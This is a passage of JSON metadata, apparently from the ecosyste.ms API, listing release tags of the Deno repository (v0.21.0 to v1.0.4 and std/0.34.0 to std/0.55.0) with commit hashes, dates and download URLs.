1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2